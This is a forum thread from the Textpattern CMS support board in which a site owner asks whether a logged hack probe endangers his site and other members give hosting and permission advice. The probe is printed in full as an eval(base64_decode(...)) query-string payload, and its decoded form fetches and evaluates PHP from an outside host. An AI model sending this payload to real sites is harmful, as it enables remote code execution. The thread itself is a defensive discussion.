Go to main content

Textpattern CMS support forum

You are not logged in. Register | Login | Help

#1 2013-03-31 12:39:00

maratnugmanov
Member
From: Russia / Kazakhstan
Registered: 2013-02-24
Posts: 54
Website

Hack probing on my site detected

Here’s what I’ve found last night in logs:
Firstly someone came on my site from http://​dr4g0n.​name:​8080/​dokuwiki/​doku.​php?​id=start,
then from another IP came this request:
?text=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2h3LWNhcmdvLnJ1L25ldGNhdF9maWxlcy8xNjcvMS50eHQnKSk7));

Should I arm already?

I also decoded this request from base64 to normal text, here’s command eval(file_get_contents('http://hw-cargo.ru/netcat_files/167/1.txt'));.
You can check this txt by yourself, its’ just a txt with a list of PHP commands.

So how can I check If my site is affected / infected ?

Last edited by maratnugmanov (2013-03-31 12:54:46)

Offline

#2 2013-03-31 13:42:58

towndock
Member
From: Oriental, NC USA
Registered: 2007-04-06
Posts: 329
Website

Re: Hack probing on my site detected

That doesn’t look like anything specific to Textpattern. It may be a question more appropriate for your web hosting company.

Offline

#3 2013-04-01 04:12:48

maratnugmanov
Member
From: Russia / Kazakhstan
Registered: 2013-02-24
Posts: 54
Website

Re: Hack probing on my site detected

So textpattern is not affected with such request?

Offline

#4 2013-04-01 04:47:35

bici
Member
From: vancouver
Registered: 2004-02-24
Posts: 2,072
Website Mastodon

Re: Hack probing on my site detected

maratnugmanov wrote:

So textpattern is not affected with such request?

no mention of Textpattern in the code you posted.

Who is your ISP? i.e. where is your site hosted? have you asked their support staff to investigate.

Empty your log file. and double-check all your permissions on your files.

Do you have comments turned on?

Last edited by bici (2013-04-01 05:16:06)


…. texted postive

Offline

#5 2013-04-01 08:22:27

maratnugmanov
Member
From: Russia / Kazakhstan
Registered: 2013-02-24
Posts: 54
Website

Re: Hack probing on my site detected

I mean that I saw some videos of using vulnerables in Wordpress and Joomla, using such commands, so the question is simple – does textpattern is vulnerable for such attacks?
Comments are on, but I don’t have one – site is too young.
The command looks like this, it contains instructions to include PHP commands. The question is – will textpattern try to execute those?
http://mysite.com/?text=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2h3LWNhcmdvLnJ1L25ldGNhdF9maWxlcy8xNjcvMS50eHQnKSk7));
I don’t think I should contact my hoster every time someone tries to use Wordpress hacks on me. They just shouldn’t work.

For example I can try to run this command on your website (which I wouldn’t do, I’m just giving an example), just by adding this to your site URL. Will you immediately contact your hoster? And how can he protect you from this random stuff. He can blacklist some IPs etc, but I don’t think there is much to investigate.

Last edited by maratnugmanov (2013-04-01 08:26:17)

Offline

#6 2013-04-01 10:25:12

gaekwad
Server grease monkey
From: People's Republic of Cornwall
Registered: 2005-11-19
Posts: 4,134
GitHub

Re: Hack probing on my site detected

Hi Marat.
If the website you are referring to is hw-cargo.ru, there are nearly 1,5000 websites on the same web server, so it’s very likely another website has compromised security. If you contact your host, there may be cleanup on other sites that is required. I agree with Giovanni, there is no mention of Textpattern in the code you posted, although since the files folder has more liberal file permissions it’s possible another website on the same server has found the files folder has 777 permissions and just used that.

I suggest deleting the 1.txt file, changing the file permissions on the files folder to 755 until the problem is solved with the rogue site.

Offline

#7 2013-04-01 15:17:54

maruchan
Member
From: Ukiah, California
Registered: 2010-06-12
Posts: 590
Website

Re: Hack probing on my site detected

This seems like it could affect Textpattern if you are not sanitizing your GET variables, and happen to be using a variable called “text”. :-)

Offline

#8 2013-04-01 20:54:24

maratnugmanov
Member
From: Russia / Kazakhstan
Registered: 2013-02-24
Posts: 54
Website

Re: Hack probing on my site detected

After my request of removing 1.txt from the first site – it was removed, but no luck – now almost similar request is going from another site. Already wrote on that to possible domain registrator and possible hoster, but this time this is 100% not infected site – this is nest itself – the mainpage of domain has malicious code, and all subdomains too – they want you to install adobe flash player, some scripts changes page address to adobe’s to fool you.
+100 for Textpattern that it not so common as Wordpress – I don’t think that I will be affected any time soon.

Offline

Board footer

Powered by FluxBB